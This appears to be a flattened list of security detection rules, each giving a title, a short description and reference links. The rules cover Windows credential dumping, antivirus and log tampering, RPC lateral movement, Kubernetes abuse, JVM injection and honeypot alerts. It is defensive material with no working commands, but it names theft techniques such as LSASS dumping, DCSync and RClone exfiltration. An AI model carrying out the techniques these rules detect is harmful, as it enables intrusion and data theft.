Suspicious Add Scheduled Task From User AppData Temp Detects schtasks.exe creating a scheduled task from the user's AppData\Local\Temp folder Malware analysis: https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
Suspicious Execution of Sc to Delete AV Services Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
Stop Windows Service Detects a Windows service being stopped None
Suspicious Bitstransfer via PowerShell Detects transferring files from a system to a server using the BitsTransfer PowerShell cmdlets https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
Suspicious Cmd Execution via WMI Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html
Suspicious Characters in CommandLine Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
Wscript Execution from Non C Drive Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt, https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/
Process Start From Suspicious Folder Detects process start from rare or uncommon folders, such as temporary folders or folders that usually do not contain executable files Malware sandbox results
Squirrel Lolbin Detects Possible Squirrel Packages Manager as Lolbin http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
PsExec Tool Execution Detects PsExec service execution via default service image name https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
PsExec Service Start Detects a PsExec service start None
Run Whoami as SYSTEM Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
Winword.exe Loads Suspicious DLL Detects Winword.exe loading a custom DLL using the /l flag https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/
WMI Execution Via Office Process Initial execution of malicious document calls wmic to execute the file with regsvr32 https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
WMI Remote Command Execution An adversary might use WMI to execute commands on a remote system https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
WMI Reconnaissance List Remote Services An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, service information will be displayed on the screen if it exists. A common feedback message is "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
Windows Update Client LOLBIN Detects code execution via the Windows Update client (wuauclt) https://dtm.uk/wuauclt/
Sysinternals SDelete Registry Keys A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool. https://github.com/OTRF/detection-hackathon-apt29/issues/9, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md
Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Abusing Windows Telemetry For Persistence - Registry Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
User Account Hidden By Registry Detect modification for a specific user to prevent that user from being listed on the logon screen https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md
Service Binary in Uncommon Folder Detects the creation of a service with a service binary located in an uncommon directory https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Disable Microsoft Office Security Features Disable Microsoft Office Security Features by registry https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/
Adwind RAT / JRAT - Registry Detects javaw.exe in AppData folder as used by Adwind / JRAT https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
Office Security Settings Changed Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
Potential Persistence Via COM Hijacking From Suspicious Locations Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location. https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)
Potential Persistence Via COM Search Order Hijacking Detects potential COM object hijacking leveraging the COM Search Order https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/
SilentProcessExit Monitor Registration Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/, https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
Accessing WinAPI in PowerShell for Credentials Dumping Detects access to lsass.exe by PowerShell https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
Mimikatz Detection LSASS Access Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
PowerShell Execution Detects execution of PowerShell https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html
RClone Execution Detects execution of the RClone utility for exfiltration as used by various ransomware strains like REvil, Conti, FiveHands, etc. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware, https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a, https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone, https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html
Windows Defender Threat Detection Disabled Detects disabling Windows Defender threat protection https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Domain Trust Discovery Detects a discovery of domain trusts. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md
Lateral Movement Indicator ConDrv This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context. https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm, https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html
Security Event Log Cleared Checks for event id 1102 which indicates the security event log was cleared. https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml
Group Modification Logging Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. Event ID 4728 indicates a "Member is added to a Security Group". Event ID 4729 indicates a "Member is removed from a Security enabled-group". Event ID 4730 indicates a "Security Group is deleted". The case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10, Windows Server 2019, Windows Server 2000, Windows 2003 and XP. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634
Suspicious Esentutl Use Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. https://lolbas-project.github.io/, https://twitter.com/chadtilbury/status/1264226341408452610
Correct Execution of Nltest.exe The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm, https://attack.mitre.org/software/S0359/
Rclone Execution via Command Line or PowerShell Detects Rclone which is commonly used by ransomware groups for exfiltration https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
Activity Related to NTDS.dit Domain Hash Retrieval Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/, https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/, https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/, https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/, https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
New Service Uses Double Ampersand in Path Detects a service installation that uses a suspicious double ampersand used in the image path value Internal Research
SAM Dump to AppData Detects suspicious SAM dump activity as caused by QuarksPwDump and other password dumpers None
Django Framework Exceptions Detects suspicious Django web application framework exceptions that could indicate exploitation attempts https://docs.djangoproject.com/en/1.11/ref/exceptions/, https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
Potential JNDI Injection Exploitation In JVM Based Application Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation. https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs, https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0
Potential Local File Read Vulnerability In JVM Based Application Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag. https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Potential OGNL Injection Exploitation In JVM Based Application Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the root cause of some high profile RCEs such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134) https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Kubernetes CronJob/Job Modification Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob
Process Execution Error In JVM Based Application Detects process execution related exceptions in JVM based apps, often relates to RCE https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Potential XXE Exploitation Attempt In JVM Based Application Detects XML parsing issues; if the application expects to work with XML, make sure that the parser is initialized safely. https://rules.sonarsource.com/java/RSPEC-2755, https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Kubernetes Admission Controller Modification Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://security.padok.fr/en/blog/kubernetes-webhook-attackers
Deployment Deleted From Kubernetes Cluster Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/
Kubernetes Events Deleted Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/
Potential Remote Command Execution In Pod Container Detects attempts to execute remote commands within a Pod's container using e.g. the "kubectl exec" command. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/
Container With A hostPath Mount Created Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/, https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216
Privileged Container Deployed Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting container breakout attacks. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact with and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/, https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer, https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html, https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html
Creation Of Pod In System Namespace Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets, have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container, e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/
RBAC Permission Enumeration Attempt Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization. https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html
Kubernetes Rolebinding Modification Detects when a Kubernetes Rolebinding is created or modified. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab
Kubernetes Secrets Enumeration Detects enumeration of Kubernetes secrets. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/
Kubernetes Secrets Modified or Deleted Detects when Kubernetes Secrets are Modified or Deleted. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/
New Kubernetes Service Account Created Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/
Potential Sidecar Injection Into Running Deployment Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod that resides alongside the main container. One way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separate pod in the cluster. https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch, https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/
Kubernetes Unauthorized or Unauthenticated Access Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues
Potential RCE Exploitation Attempt In NodeJS Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability. https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
OpenCanary - FTP Login Attempt Detects instances where an FTP service on an OpenCanary node has had a login attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - GIT Clone Request Detects instances where a GIT service on an OpenCanary node has had a Git Clone request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - HTTPPROXY Login Attempt Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - HTTP GET Request Detects instances where an HTTP service on an OpenCanary node has received a GET request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - HTTP POST Login Attempt Detects instances where an HTTP service on an OpenCanary node has had a login attempt via Form POST. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - MSSQL Login Attempt Via SQLAuth Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - MSSQL Login Attempt Via Windows Authentication Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - MySQL Login Attempt Detects instances where a MySQL service on an OpenCanary node has had a login attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - NTP Monlist Request Detects instances where an NTP service on an OpenCanary node has had an NTP monlist request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - REDIS Action Command Attempt Detects instances where a REDIS service on an OpenCanary node has had an action command attempted. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SIP Request Detects instances where a SIP service on an OpenCanary node has had a SIP request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SMB File Open Request Detects instances where an SMB service on an OpenCanary node has had a file open request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SNMP OID Request Detects instances where an SNMP service on an OpenCanary node has had an OID request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SSH Login Attempt Detects instances where an SSH service on an OpenCanary node has had a login attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SSH New Connection Attempt Detects instances where an SSH service on an OpenCanary node has had a connection attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - Telnet Login Attempt Detects instances where a Telnet service on an OpenCanary node has had a login attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - TFTP Request Detects instances where a TFTP service on an OpenCanary node has had a request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - VNC Connection Attempt Detects instances where a VNC service on an OpenCanary node has had a connection attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
Python SQL Exceptions Generic rule for SQL exceptions in Python according to PEP 249 https://www.python.org/dev/peps/pep-0249/#exceptions
Remote Schedule Task Lateral Movement via ATSvc Detects remote RPC calls to create or execute a scheduled task via ATSvc https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Schedule Task Recon via ATSvc Detects remote RPC calls to read information about scheduled tasks via ATSvc https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/zeronetworks/rpcfirewall, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Possible DCSync Attack Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Event Log Recon Detects remote RPC calls to get event log information via EVEN or EVEN6 https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Encrypting File System Abuse Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Schedule Task Lateral Movement via ITaskSchedulerService Detects remote RPC calls to create or execute a scheduled task https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Schedule Task Recon via ITaskSchedulerService Detects remote RPC calls to read information about scheduled tasks https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Printing Abuse for Lateral Movement Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote DCOM/WMI Lateral Movement Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Registry Lateral Movement Detects remote RPC calls to modify the registry and possibly execute code https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Registry Recon Detects remote RPC calls to collect information https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Server Service Abuse Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Server Service Abuse for Lateral Movement Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
